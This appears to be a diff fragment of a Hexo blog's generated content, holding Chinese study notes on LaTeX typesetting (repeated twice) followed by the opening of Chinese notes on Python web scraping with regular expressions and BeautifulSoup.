    中文几乎没有改变,将\documentclass里内容改成ctexart:Chinese TeX article,并设置[UTF8]

    \documentclass[UTF8]{ctexart}
    \begin{document}
    今天你吃了吗?
    \end{document}

    png

    语法结构

    相比较原始的$\TeX$语言,$\LaTeX$的语法结构被限制为相对固定的形式。

    • 命令:参数总在后面花括号表示,用中括号表示可选参数
    • 环境
    • 注释:以百分号%开头

    LATEX 宏:命令与环境

    • 命令:以反斜线开头,可以带零到多个参数:\frac{1}{2}: $\frac{1}{2}$
    • 环境:
    \begin{flushright}  % 环境内的文字保持右对齐
    环境的内容
    \end{flushright}

    正文文本

    换行符会被视作一个空格

    如果需要两个自然段,则要敲两个回车

    \documentclass{article}
    \begin{document}
    aa

    bb
    \end{document}

    正文符号

    \S \P \textbullet \textregistered \texttrademark

    $\S \P \textbullet \textregistered \texttrademark $

    (hexo 里显示不出来…)

    公式

    数学公式

    数学模式下字体、符号、间距与正文都不同,一切数学公式(包括单个符号$n$、$\pi$)都要在数学模式下输入。

    • 行内(inline)公式:使用一对$$来表示,如$a+b=c$
    • 显示(display)公式:
      • 简单的不编号公式用命令\[\]表示。(不要使用双美元符号$$ $$,会有细微的差异)
      • 基本的标号的公式用equation环境
      • 更复杂的结构,使用amsmath宏包提供专门的数学环境。(不要使用eqnarray环境)

    数学结构

    • 上标与下标:用^和_表示
    • 上下划线与花括号:\overline\underline\overbrace\underbrace
    • 分式:\frac{分子}{分母}:$\frac{分子}{分母}$
    • 根式:\sqrt[次数]{根号下}:$\sqrt[次数]{根号下}$
    • 矩阵:使用amsmath宏包提供的专门的矩阵环境matrixpmatrixbmatrix等。特别复杂的矩阵(如带线条)使用array环境作为表格画出。

    数学符号

    • 数学字母$a,b,\alpha,\Delta$, 数学字体\mathbb($\mathbb R$), \mathcal($\mathcal P$)等
    • 普通符号:如\infty($\infty$), \angle($\angle$)等
    • 二元运算符:$a+b,a-b,a\oplus b$
    • 二元关系符:$a=b,a\le b$
    • 括号:$\left < a,b\right >$, 使用\left, \right 放大
    • 标点:逗号、分号(\colon

    不同的类型会决定不同的断行模式和不同的距离

    amsmath 与 mathtools

    • amsmath是基本的数学工具包,在包含数学公式的文档中几乎无处不在。

    • mathtools则对 amsmath做了一些补充和增强。

    \documentclass{article}
    \usepackage{amsmath}
    \usepackage{mathtools}
    \begin{document}
    \begin{align*}
    2^5 &= (1+1)^5 \\
    &= \begin{multlined}[t]
    \binom50\cdot 1^5 + \binom51\cdot 1^4 \cdot 1
    + \binom52\cdot 1^3 \cdot 1^2 \\
    + \binom53\cdot 1^2 \cdot 1^3
    + \binom54\cdot 1 \cdot 1^4 + \binom55\cdot 1^5
    \end{multlined} \\
    &= \binom50 + \binom51 + \binom52 + \binom53
    + \binom54 + \binom55
    \end{align*}
    \end{document}

    png

    科技功能

    • siunitx(国际单位制扩展): 数字单位的一揽子解决方案
    \usepackage{siunitx}
    \num{-1.235e96} \\
    \SI{299792458}{m/s} \\
    \SI{2x7x3.5}{m}

    $-1.235\times10^{96}$

    $299,792,458 \mathrm{m/s}$

    $2\mathrm m\times 7\mathrm m\times 3.5\mathrm m$(仿)

    \begin{tabular}{|S|}\hline
    -234532\\ 13.55 \\ .9e37km \\
    \hline
    \end{tabular}
    • chemformula:编写化学式
      • chemformula宏包(过去用mhchem)是在$\TeX$中定义新语法规则的典范。
    \usepackage{chemformula}

    它让化学反应式的书写比数学式还要容易,绝大部分功能只需要\ch 一条命令:

    \ch{2 H2 + O2 -> 2H2O}
    \ch{2H2O -> 2 H2 ^ + O2 ^}

    如何用 markdown 写化学方程式?- 知乎 (zhihu.com)

    $$3 Ca O +Fe_2O_3\stackrel{高温}{==}2 Fe + 3 CO_2$$

    $2Fe^{3+} + SO_2 + Ba^{2+} + 2H_2O -> 2Fe^{2+} + BaSO_4\downarrow + 4H^+$

    列表与文本块

    列表环境

    • enumerate 编号
    \begin{enumerate}
    \item aaa
    \item bbb
    \end{enumerate}

    $\mathrm{1.,aaa}$

    $\mathrm{2.,bbb}$

    $\mathrm{3.,ccc}$

    • a 使用itemize 不编号
    • description 有标题

    定理类环境

    • 定义定理类环境
      • \newtherorem定义定理类环境,如
    \newtheorem{thm}{定理}[section]
    • 使用定理类环境:
    \begin{thm}
    一个定理
    \end{thm}

    诗歌和引文

    • verse
    • quote
    • quotation

    抄录代码

    • \verb命令,如
    代码\verb|#include<stdio.h>|
    • verbatim
    \begin{verbatim}
    #include <stdio.h>
    int main(void) {
    printf("hello world.");
    return 0;
    }
    \end{verbatim}

    高级代码:语法高亮

    • 使用listings 宏包
    \begin{lstlisting}[language=C,
    basicstyle=\ttfamily,
    stringstyle=\color{blue}]
    #include <stdio.h>
    int main(void) {
    printf("hello world.");
    return 0;
    }
    \end{lstlisting}
    • minted 宏包(调用 Pygment)

    算法结构

    • clrscode 宏包(算法导论)

    png

    • algorithm2e 宏包
    • algorithmicx 宏包的 algpseudocode 格式

    图表与浮动环境

    画表格

    使用 tabular 环境。

    \begin{tabular}{|rr|}
    \hline
    输入& 输出\\ \hline
    $-2$ & 4 \\
    0 & 0 \\
    2 & 4 \\ \hline
    \end{tabular}
    输入输出
    -24
    00
    24

    可以使用一些工具生成表格代码,例如:

    Create LaTeX tables online – TablesGenerator.com

    功能各异的表格宏包

    • 单元格处理:multirow(多行变一行)、makecell(一行拆多行)
    • 长表格:longtable(长表格,超出页自动换下一页)、xtab
    • 定宽表格:xtabular
    • 表线控制:booktabs(三线表)、diagbox(斜线宏包)、arydshln
    • 表列格式:array
    • 综合应用:tabu

    插图

    使用graphicx宏包提供的\includegraphics命令

    \includegraphics[width=2cm]{pkulogo.pdf}

    代码画图

    优先使用外部工具画图,特别是可视化工具,例如一般的矢量图用InkscapeIllustrator 甚至 PowerPoint(保存为 pdf 格式),数学图形用MATLABmatplotlib 之类。
    如果有合适的宏包,某些特定类型的图形也可以用$\LaTeX$代码作图。现代
    $\LaTeX$ 绘图宏包很多基于 TikZ

    浮动体

    • figure 环境
    • table 环境
    • 其他环境可以使用 float 宏包得到

    浮动体的标题用 \caption 命令得到,自动编号。

    自动化工具

    目录

    png

    交叉引用工作原理

    png

    hyperref: PDF 的链接与书签

    • hyperref 产生链接和书签的原理与普通的交叉引用相同。hyperref 会在 PDF 中写入相应的“锚点”代码,在其他地方引用。交叉引用的代码并入 .aux 文件,目录的代码并入 .toc 文件,PDF 书签则产生单独的.out 文件。

    BIBTEX 参考文献

    png

    png

    设置文献格式

    • 选用合适的.bst 格式,比如plainnat , gbt7714-plain

    • natbib 与作者‐年格式

    • 利用 custom‐bib 产生定制的格式文件

    • biblatex + Biber:文献处理的新方式

    第三部分:设计文档格式

    基本规则

    • 格式与内容分离不要在意细节
    • 使用内容相关的命令与环境
    It is \emph{important}。% 推荐
    It is \textit{important}. % 不推荐

    两者在默认情况下效果一样,但是在不同模板效果不一定一样。

    \caption{流程图}  % 推荐
    \textbf{图 1: } 流程图 % 不推荐,不会自动编号

    使用宏包

    • 作用:宏包将可重用的代码提取出来,相当于其他程序语言中的“库”。使用宏包可以用简单的接口实现非常复杂的功能,有些对于个人来说是“不可能的任务”。
    • 问题:第三方宏包可能破坏 TEX 设计的“向前兼容性”;不同宏包之间如果出现兼容性问题更难解决。——使用宏包会将兼容性问题从 TEX 语言扩大到所有宏包代码。

    现代$\LaTeX$文档离不开第三方宏包,但应该合理使用:

    • 尽量不造轮子
    • 尽量排除不使用的宏包

    格式控制功能

    字体符号

    • 字体
      • \rmfamily, \textrm{…}
      • \sffamily, \textsf{…}
      • \ttfamily, \texttt{…}
    • 字号:\Huge, \LARGE, \Large, \large, \normalsize, \small,
      \footnotesize, \scriptsize, \tiny
    • 中文字号:\zihao{5}(五号字)、\zihao{‐3}(小三号字)

    对齐

    • 居中对齐:\centering
    • 左对齐:\raggedleft
    • 右对齐:\raggedright

    空白间距

    • 水平方向:\hspace{2cm}
    • 垂直方向:\vspace{3mm}

    版面布局

    • geometry
    • fancyhdr

    分页断行

    • \linebreak、\
      \pagebreak、\newpage、\clearpage、\cleardoublepage

    盒子

    • \mbox{内容}
      \parbox{4em}{内容}、minipage

    格式应用于文档

    使用在导言区单独设置格式

    • 直接设置相关参数: \parindent、\parskip、
      \linespread、\pagestyle
    • 修改部分命令定义。如修改:\thesection、\labelenumi、
      \descriptionlabel、\figurename
    • 使用工具宏包完成设置。
    • 如使用 ctex 宏包设置中文格式,使用 tocloft 宏包设置目录格式。

    利用自定义命令和环境

    \documentclass{ctexart}

    \newcommand\prg[1]{\textsf{#1}}

    \begin{document}

    程序 \prg{sort} 很有用

    \end{document}

    章节标题

    浮动标题

    • caption 宏包

    列表环境

    • enumitem 宏包
    ]]>
    + 讲义

    参考网站

    课程

    第一部分 组织文档结构

    文档由什么组成?

    • 标题
    • 前言/摘要
    • 目录
    • 正文
      • 篇、章、小节、小段
        • 文字、公式
        • 列表:编号的、不编号的、带小标题的
        • 定理、引理、命题、证明、结论
        • 诗歌、引文、程序代码、算法伪码
        • 制表
        • 画图
    • 文献
    • 索引、词汇表

    纲举目张

    $\LaTeX$支持结构化的文档编写方式,步骤:

    • 拟定主题
    • 列出提纲
    • 填写内容
    • 调整格式不要在意格式

    其他软件

    • markdown
    • LYX:结构化的文档写作系统

    LATEX 文档基本结构

    1
    2
    3
    4
    5
    6
    7
    8
    %%% 简单文档
    % 导言:格式设置
    \documentclass{ctexart}
    \usepackage[b5paper]{geometry}
    % 正文:填写内容
    \begin{document}
    使用 \LaTeX
    \end{document}

    document环境为界,

    • document环境前是导言部分(preamble);

    • 环境内部是正文部分;

    • 环境之后的部分被忽略

    在导言区进行格式设置,正文部分套用格式。

    文档部件

    • 标题:\title\author\date——\maketitle
    • 摘要/前言:abstract环境/\chapter*
    • 目录:\tableofcontents
    • 章节:\chapter\section
    • 附录:\appendix+\chapter\section
    • 文献:\bibliography
    • 索引:\printindex

    文档划分

    • 大型文档:
      • \frontmatter
      • \mainmatter
      • \backmatter
    • 一般文档:
      • \appendix
    层次名称命令说明
    -1part\part可选的最高层
    0chapter\chapterreportbook类最高层:
    1section\sectionarticle类最高层:学生论文
    2subsection\subsectionreport, book
    3subsubsection\subsubsection默认不编号、不编目录
    4paragraph\paragraph默认不编号、不编目录
    5subparagraph\subparagraph默认不编号、不编目录

    磁盘文件组织

    小文档将所有内容写在同一个目录中。对比较大的文档,可以将文档分成多个文件,并划分文件目录结构:

    • 主文档,给出文档框架结构
    • 按内容章节划分不同的文件
    • 使用单独的类文件和格式文件设置格式
    • 用小文件隔离复杂的图表

    相关命令:

    • \documentclass:读入文档类文件(.cls)
    • \usepackage:读入一个格式文件——宏包(.sty)
    • \include:分页,并读入章节文件(.tex)
    • \input:读入任意的文件

    文档框架示例

    png

    第二部分 填写文档内容

    LATEX 基础

    迟到的 Hello world.

    找个东西输入文本:

    1
    2
    3
    4
    \documentclass{article}
    \begin{document}
    Hello world.
    \end{document}

    中文几乎没有改变,将\documentclass里内容改成ctexart:Chinese TeX article,并设置[UTF8]

    1
    2
    3
    4
    \documentclass[UTF8]{ctexart}
    \begin{document}
    今天你吃了吗?
    \end{document}

    png

    语法结构

    相比较原始的$\TeX$语言,$\LaTeX$的语法结构被限制为相对固定的形式。

    • 命令:参数总在后面花括号表示,用中括号表示可选参数
    • 环境
    • 注释:以百分号%开头

    LATEX 宏:命令与环境

    • 命令:以反斜线开头,可以带零到多个参数:\frac{1}{2}: $\frac{1}{2}$
    • 环境:
    1
    2
    3
    \begin{flushright}  % 环境内的文字保持右对齐
    环境的内容
    \end{flushright}

    正文文本

    换行符会被视作一个空格

    如果需要两个自然段,则要敲两个回车

    1
    2
    3
    4
    5
    6
    \documentclass{article}
    \begin{document}
    aa

    bb
    \end{document}

    正文符号

    1
    \S \P \textbullet \textregistered \texttrademark

    $\S \P \textbullet \textregistered \texttrademark $

    (hexo 里显示不出来…)

    公式

    数学公式

    数学模式下字体、符号、间距与正文都不同,一切数学公式(包括单个符号$n$、$\pi$)都要在数学模式下输入。

    • 行内(inline)公式:使用一对$$来表示,如$a+b=c$
    • 显示(display)公式:
      • 简单的不编号公式用命令\[\]表示。(不要使用双美元符号$$ $$,会有细微的差异)
      • 基本的标号的公式用equation环境
      • 更复杂的结构,使用amsmath宏包提供专门的数学环境。(不要使用eqnarray环境)

    数学结构

    • 上标与下标:用^和_表示
    • 上下划线与花括号:\overline\underline\overbrace\underbrace
    • 分式:\frac{分子}{分母}:$\frac{分子}{分母}$
    • 根式:\sqrt[次数]{根号下}:$\sqrt[次数]{根号下}$
    • 矩阵:使用amsmath宏包提供的专门的矩阵环境matrixpmatrixbmatrix等。特别复杂的矩阵(如带线条)使用array环境作为表格画出。

    数学符号

    • 数学字母$a,b,\alpha,\Delta$, 数学字体\mathbb($\mathbb R$), \mathcal($\mathcal P$)等
    • 普通符号:如\infty($\infty$), \angle($\angle$)等
    • 二元运算符:$a+b,a-b,a\oplus b$
    • 二元关系符:$a=b,a\le b$
    • 括号:$\left < a,b\right >$, 使用\left, \right 放大
    • 标点:逗号、分号(\colon

    不同的类型会决定不同的断行模式和不同的距离

    amsmath 与 mathtools

    • amsmath是基本的数学工具包,在包含数学公式的文档中几乎无处不在。

    • mathtools则对 amsmath做了一些补充和增强。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    \documentclass{article}
    \usepackage{amsmath}
    \usepackage{mathtools}
    \begin{document}
    \begin{align*}
    2^5 &= (1+1)^5 \\
    &= \begin{multlined}[t]
    \binom50\cdot 1^5 + \binom51\cdot 1^4 \cdot 1
    + \binom52\cdot 1^3 \cdot 1^2 \\
    + \binom53\cdot 1^2 \cdot 1^3
    + \binom54\cdot 1 \cdot 1^4 + \binom55\cdot 1^5
    \end{multlined} \\
    &= \binom50 + \binom51 + \binom52 + \binom53
    + \binom54 + \binom55
    \end{align*}
    \end{document}

    png

    科技功能

    • siunitx(国际单位制扩展): 数字单位的一揽子解决方案
    1
    \usepackage{siunitx}
    1
    2
    3
    \num{-1.235e96} \\
    \SI{299792458}{m/s} \\
    \SI{2x7x3.5}{m}

    $-1.235\times10^{96}$

    $299,792,458 \mathrm{m/s}$

    $2\mathrm m\times 7\mathrm m\times 3.5\mathrm m$(仿)

    1
    2
    3
    4
    \begin{tabular}{|S|}\hline
    -234532\\ 13.55 \\ .9e37km \\
    \hline
    \end{tabular}
    • chemformula:编写化学式
      • chemformula宏包(过去用mhchem)是在$\TeX$中定义新语法规则的典范。
    1
    \usepackage{chemformula}

    它让化学反应式的书写比数学式还要容易,绝大部分功能只需要\ch 一条命令:

    1
    2
    \ch{2 H2 + O2 -> 2H2O}
    \ch{2H2O -> 2 H2 ^ + O2 ^}

    如何用 markdown 写化学方程式?- 知乎 (zhihu.com)

    $$3 Ca O +Fe_2O_3\stackrel{高温}{==}2 Fe + 3 CO_2$$

    $2Fe^{3+} + SO_2 + Ba^{2+} + 2H_2O -> 2Fe^{2+} + BaSO_4\downarrow + 4H^+$

    列表与文本块

    列表环境

    • enumerate 编号
    1
    2
    3
    4
    \begin{enumerate}
    \item aaa
    \item bbb
    \end{enumerate}

    $\mathrm{1.,aaa}$

    $\mathrm{2.,bbb}$

    $\mathrm{3.,ccc}$

    • a 使用itemize 不编号
    • description 有标题

    定理类环境

    • 定义定理类环境
      • \newtherorem定义定理类环境,如
    1
    \newtheorem{thm}{定理}[section]
    • 使用定理类环境:
    1
    2
    3
    \begin{thm}
    一个定理
    \end{thm}

    诗歌和引文

    • verse
    • quote
    • quotation

    抄录代码

    • \verb命令,如
    1
    代码\verb|#include<stdio.h>|
    • verbatim
    1
    2
    3
    4
    5
    6
    7
    \begin{verbatim}
    #include <stdio.h>
    int main(void) {
    printf("hello world.");
    return 0;
    }
    \end{verbatim}

    高级代码:语法高亮

    • 使用listings 宏包
    1
    2
    3
    4
    5
    6
    7
    8
    9
    \begin{lstlisting}[language=C,
    basicstyle=\ttfamily,
    stringstyle=\color{blue}]
    #include <stdio.h>
    int main(void) {
    printf("hello world.");
    return 0;
    }
    \end{lstlisting}
    • minted 宏包(调用 Pygment)

    算法结构

    • clrscode 宏包(算法导论)

    png

    • algorithm2e 宏包
    • algorithmicx 宏包的 algpseudocode 格式

    图表与浮动环境

    画表格

    使用 tabular 环境。

    1
    2
    3
    4
    5
    6
    7
    \begin{tabular}{|rr|}
    \hline
    输入& 输出\\ \hline
    $-2$ & 4 \\
    0 & 0 \\
    2 & 4 \\ \hline
    \end{tabular}
    输入输出
    -24
    00
    24

    可以使用一些工具生成表格代码,例如:

    Create LaTeX tables online – TablesGenerator.com

    功能各异的表格宏包

    • 单元格处理:multirow(多行变一行)、makecell(一行拆多行)
    • 长表格:longtable(长表格,超出页自动换下一页)、xtab
    • 定宽表格:xtabular
    • 表线控制:booktabs(三线表)、diagbox(斜线宏包)、arydshln
    • 表列格式:array
    • 综合应用:tabu

    插图

    使用graphicx宏包提供的\includegraphics命令

    1
    \includegraphics[width=2cm]{pkulogo.pdf}

    代码画图

    优先使用外部工具画图,特别是可视化工具,例如一般的矢量图用InkscapeIllustrator 甚至 PowerPoint(保存为 pdf 格式),数学图形用MATLABmatplotlib 之类。
    如果有合适的宏包,某些特定类型的图形也可以用$\LaTeX$代码作图。现代
    $\LaTeX$ 绘图宏包很多基于 TikZ

    浮动体

    • figure 环境
    • table 环境
    • 其他环境可以使用 float 宏包得到

    浮动体的标题用 \caption 命令得到,自动编号。

    自动化工具

    目录

    png

    交叉引用工作原理

    png

    hyperref: PDF 的链接与书签

    • hyperref 产生链接和书签的原理与普通的交叉引用相同。hyperref 会在 PDF 中写入相应的“锚点”代码,在其他地方引用。交叉引用的代码并入 .aux 文件,目录的代码并入 .toc 文件,PDF 书签则产生单独的.out 文件。

    BIBTEX 参考文献

    png

    png

    设置文献格式

    • 选用合适的.bst 格式,比如plainnat , gbt7714-plain

    • natbib 与作者‐年格式

    • 利用 custom‐bib 产生定制的格式文件

    • biblatex + Biber:文献处理的新方式

    第三部分:设计文档格式

    基本规则

    • 格式与内容分离不要在意细节
    • 使用内容相关的命令与环境
    1
    2
    It is \emph{important}。% 推荐
    It is \textit{important}. % 不推荐

    两者在默认情况下效果一样,但是在不同模板效果不一定一样。

    1
    2
    \caption{流程图}  % 推荐
    \textbf{图 1: } 流程图 % 不推荐,不会自动编号

    使用宏包

    • 作用:宏包将可重用的代码提取出来,相当于其他程序语言中的“库”。使用宏包可以用简单的接口实现非常复杂的功能,有些对于个人来说是“不可能的任务”。
    • 问题:第三方宏包可能破坏 TEX 设计的“向前兼容性”;不同宏包之间如果出现兼容性问题更难解决。——使用宏包会将兼容性问题从 TEX 语言扩大到所有宏包代码。

    现代$\LaTeX$文档离不开第三方宏包,但应该合理使用:

    • 尽量不造轮子
    • 尽量排除不使用的宏包

    格式控制功能

    字体符号

    • 字体
      • \rmfamily, \textrm{…}
      • \sffamily, \textsf{…}
      • \ttfamily, \texttt{…}
    • 字号:\Huge, \LARGE, \Large, \large, \normalsize, \small,
      \footnotesize, \scriptsize, \tiny
    • 中文字号:\zihao{5}(五号字)、\zihao{‐3}(小三号字)

    对齐

    • 居中对齐:\centering
    • 左对齐:\raggedleft
    • 右对齐:\raggedright

    空白间距

    • 水平方向:\hspace{2cm}
    • 垂直方向:\vspace{3mm}

    版面布局

    • geometry
    • fancyhdr

    分页断行

    • \linebreak、\
      \pagebreak、\newpage、\clearpage、\cleardoublepage

    盒子

    • \mbox{内容}
      \parbox{4em}{内容}、minipage

    格式应用于文档

    使用在导言区单独设置格式

    • 直接设置相关参数: \parindent、\parskip、
      \linespread、\pagestyle
    • 修改部分命令定义。如修改:\thesection、\labelenumi、
      \descriptionlabel、\figurename
    • 使用工具宏包完成设置。
    • 如使用 ctex 宏包设置中文格式,使用 tocloft 宏包设置目录格式。

    利用自定义命令和环境

    1
    2
    3
    4
    5
    6
    7
    8
    9
    \documentclass{ctexart}

    \newcommand\prg[1]{\textsf{#1}}

    \begin{document}

    程序 \prg{sort} 很有用

    \end{document}

    章节标题

    浮动标题

    • caption 宏包

    列表环境

    • enumitem 宏包
    ]]>
    @@ -9753,7 +9753,7 @@ /posts/Python-%E8%8E%AB%E7%83%A6python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%EF%BC%88scraping%EF%BC%89/ - 官网

    课程

    1.1 了解网页结构

    查看网页源代码

    爬取网页: Scraping tutorial 1 | 莫烦 Python

    <!DOCTYPE html>
    <html lang="cn">
    <head>
    <meta charset="UTF-8">
    <title>Scraping tutorial 1 | 莫烦 Python</title>
    <link rel="icon" href="https://morvanzhou.github.io/static/img/description/tab_icon.png">
    </head>
    <body>
    <h1>爬虫测试 1</h1>
    <p>
    这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a>
    <a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.
    </p>

    </body>
    </html>
    from urllib.request import urlopen

    html = urlopen(
    "https://yulizi123.github.io/static/scraping/basic-structure.html"
    ).read().decode('utf-8')
    # 因为这个网页有中文元素, 应该用 utf-8 解码
    print(html)
    <!DOCTYPE html><html lang="cn"><head><meta charset="UTF-8"><title>Scraping tutorial 1 | 莫烦 Python</title><link rel="icon" href="https://morvanzhou.github.io/static/img/description/tab_icon.png"></head><body><h1>爬虫测试 1</h1><p>这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.</p></body></html>

    先导: 正则表达式 Regular Expression

    教程:

    正则表达式 (Regular Expression) 又称 RegEx, 是用来匹配字符的一种工具. 在一大串字符中寻找你需要的内容. 它常被用在很多方面, 比如网页爬虫, 文稿整理, 数据筛选等等.

    从浏览器中读取的代码中找到有用的信息

    简单 Python 匹配
    pattern1 = "cat"
    pattern2 = "bird"
    string = "dog runs to cat"
    print(pattern1 in string)
    print(pattern2 in string)
    TrueFalse
    用正则表达式寻找配对
    import re

    pattern1 = "cat"
    pattern2 = "bird"
    string = "dog runs to cat"
    print(re.search(pattern1, string))
    print(re.search(pattern2, string))
    <re.Match object; span=(12, 15), match='cat'>None

    在 string 12-15 之间找到了字符串 cat

    匹配多种可能 使用[]

    两种可能 run 或 ran

    ptn = r"r[au]n"  # 加了 r 就是表达式, 没加就是字符串
    print(re.search(ptn, "dog runs to cat"))
    <re.Match object; span=(4, 7), match='run'>
    匹配多种可能
    print(re.search(r"r[A-Z]n", "dog runs to cat"))  # 大写字母
    print(re.search(r"r[a-z]n", "dag runs to cat")) # 小写字母
    print(re.search(r"r[0-9]n", "dog r1ns to cat")) # 数字
    print(re.search(r"r[0-9a-z]n", "dog runs to cat")) # 字母或数字
    None<re.Match object; span=(4, 7), match='run'><re.Match object; span=(4, 7), match='r1n'><re.Match object; span=(4, 7), match='run'>
    特殊种类匹配
    数字
    # \d: 匹配所有数字
    print(re.search(r"r\dn", "run r4n"))
    # \d: 匹配所有非数字
    print(re.search(r"r\Dn", "run r4n"))
    <re.Match object; span=(4, 7), match='r4n'><re.Match object; span=(0, 3), match='run'>
    空白
    # \s: 任何空白, 如\t, \n, \r, \f, \v
    print(re.search(r"r\sn", "r\nn r4n"))
    # \S: 任何非空白
    print(re.search(r"r\Sn", "r\nn r4n"))
    <re.Match object; span=(0, 3), match='r\nn'><re.Match object; span=(4, 7), match='r4n'>
    所有数字和下划线_
    # \w: [a-zA-Z0-9_]
    print(re.search(r"r\wn", "r\nn r4n"))
    # \W: 与\w 相反
    print(re.search(r"r\Wn", "r\nn r4n"))
    <re.Match object; span=(4, 7), match='r4n'><re.Match object; span=(0, 3), match='r\nn'>
    空白字符
    # \b: 空格
    print(re.search(r"\bruns\b", "dog runs to cat"))
    print(re.search(r"\bruns\b", "dog runsto cat"))
    # \B: 非空格
    print(re.search(r"\Bruns\B", "dog runs to cat"))
    print(re.search(r"\Bruns\B", "dogrunsto cat"))
    <re.Match object; span=(4, 8), match='runs'>NoneNone<re.Match object; span=(3, 7), match='runs'>
    特殊字符 任意字符
    # \\: 匹配反斜杠\
    print(re.search(r"runs\\", "runs\ to me"))
    # .: 匹配除了\n 外的任何字符
    print(re.search(r"r.ns", "r[ns to me"))
    <re.Match object; span=(0, 5), match='runs\\'><re.Match object; span=(0, 4), match='r[ns'>
    句尾句首
    # ^: 在句首匹配
    print(re.search(r"^dog", "dog runs to cat"))
    # $: 在句尾匹配
    print(re.search(r"cat$", "dog runs to cat"))
    <re.Match object; span=(0, 3), match='dog'><re.Match object; span=(12, 15), match='cat'>
    是否
    # ()?: 无论括号内是否有内容, 都会被匹配
    print(re.search(r"Mon(day)?", "Monday"))
    print(re.search(r"Mon(day)?", "Mon"))
    <re.Match object; span=(0, 6), match='Monday'><re.Match object; span=(0, 3), match='Mon'>
    多行匹配
    # 多行情况下
    string = """
    dog runs to cat.
    I run to dog.
    """
    print(re.search(r"^I", string))
    print(re.search(r"^I", string, flags=re.M)) # 增加 flag 匹配多行
    None<re.Match object; span=(18, 19), match='I'>
    0 或多次
    # *: 出现 0 或多次都会被匹配
    print(re.search(r"ab*", "a"))
    print(re.search(r"ab*", "abbbbbbb"))
    <re.Match object; span=(0, 1), match='a'><re.Match object; span=(0, 8), match='abbbbbbb'>
    1 或多次
    # +: 出现 1 或多次都会被匹配
    print(re.search(r"ab+", "a"))
    print(re.search(r"ab+", "abbbbbbb"))
    None<re.Match object; span=(0, 8), match='abbbbbbb'>
    可选次数
    # {n,m}: 出现 n-m 次之间都会被匹配(逗号后面不能加空格)
    print(re.search(r"ab{2,10}", "a"))
    print(re.search(r"ab{2,10}", "abbbbb"))
    None<re.Match object; span=(0, 6), match='abbbbb'>
    group 组()
    # \d+ 数字出现了 1 次或多次
    # .+ 匹配所有除了\n 外所有的字符
    match = re.search(r"(\d+), Date: (.+)", "ID: 021523, Date: Feb/12/2017")
    print(match.group())
    print(match.group(1))
    print(match.group(2))
    021523, Date: Feb/12/2017021523Feb/12/2017
    组命名 ?P<组名>
    match = re.search(r"(?P<id>\d+), Date: (?P<date>.+)", "ID: 021523, Date: Feb/12/2017")
    print(match.group())
    print(match.group("id"))
    print(match.group("date"))
    021523, Date: Feb/12/2017021523Feb/12/2017
    findall 寻找所有匹配
    print(re.findall(r"r[ua]n", "run ran ren"))
    # | : 或
    print(re.findall(r"r(u|a)n", "run ran ren"))
    print(re.findall(r"run|ran", "run ran ren"))
    ['run', 'ran']['u', 'a']['run', 'ran']
    re.sub 替换
    print(re.sub(r"r[au]ns", "catches", "dog runs to cat"))
    dog catches to cat
    re.split 分裂
    print(re.split(r"[,;\.]", "a;b;c;d;e"))
    ['a', 'b', 'c', 'd', 'e']
    compile 先编译字符串
    # compile
    compiled_re = re.compile(r"r[ua]n")
    print(compiled_re.search("dog ran to cat"))
    <re.Match object; span=(4, 7), match='ran'>
    小抄

    png

    使用正则表达式爬取网页标题
    import re

    # 读取<title>和</title>之间的内容
    res = re.findall(r"<title>(.+?)</title>", html)
    print("\nPage title is: ", res[0])
    Page title is:  Scraping tutorial 1 | 莫烦 Python
    找到段落信息
    res = re.findall(r"<p>(.*?)</p>", html, flags=re.DOTALL)  # flags=re.DOTALL 选取多行信息
    print("\nPage paragraphs: ", res[0])
    Page paragraphs:  这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.

    查找所有超链接信息
    res = re.findall(r'href="(.*?)"', html)
    print("\nAll links: ", res)
    All links:  ['https://morvanzhou.github.io/static/img/description/tab_icon.png', 'https://morvanzhou.github.io/', 'https://morvanzhou.github.io/tutorials/data-manipulation/scraping/']

    2.1 BeautifulSoup 解析网页: 基础

    Beautiful Soup 中文文档

    可以使用 BeautifulSoup 进行一个高级的匹配!

    pip install beautifulsoup4
    Requirement already satisfied: beautifulsoup4 in c:\users\gzjzx\anaconda3\lib\site-packages (4.11.1)Requirement already satisfied: soupsieve>1.2 in c:\users\gzjzx\anaconda3\lib\site-packages (from beautifulsoup4) (2.3.1)Note: you may need to restart the kernel to use updated packages.

    BeautifulSoup 简单的用法

    导入网页信息
    from bs4 import BeautifulSoup
    from urllib.request import urlopen

    html = urlopen(
    "https://yulizi123.github.io/static/scraping/basic-structure.html"
    ).read().decode('utf-8')
    print(html)
    <!DOCTYPE html><html lang="cn"><head><meta charset="UTF-8"><title>Scraping tutorial 1 | 莫烦 Python</title><link rel="icon" href="https://morvanzhou.github.io/static/img/description/tab_icon.png"></head><body><h1>爬虫测试 1</h1><p>这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.</p></body></html>
    把获得的网页信息"喂给"BeautifulSoup
    soup = BeautifulSoup(html, features='lxml')  # 解析形式: lxml
    print(soup.h1) # 选出 h1
    print('\n', soup.p) # 选出 p
    <h1>爬虫测试 1</h1> <p>这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.</p>
    all_href = soup.find_all('a')  # 找到所有<a>属性
    all_href = [l['href'] for l in all_href]
    print(all_href)
    ['https://morvanzhou.github.io/', 'https://morvanzhou.github.io/tutorials/data-manipulation/scraping/']
    all_href = soup.find_all('a')
    print(all_href)
    [<a href="https://morvanzhou.github.io/">莫烦 Python</a>, <a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a>]
    all_href = soup.find_all('a')
    for l in all_href:
    print(l['href'])
    https://morvanzhou.github.io/https://morvanzhou.github.io/tutorials/data-manipulation/scraping/

    2.2 BeautifulSoup 解析网页: CSS

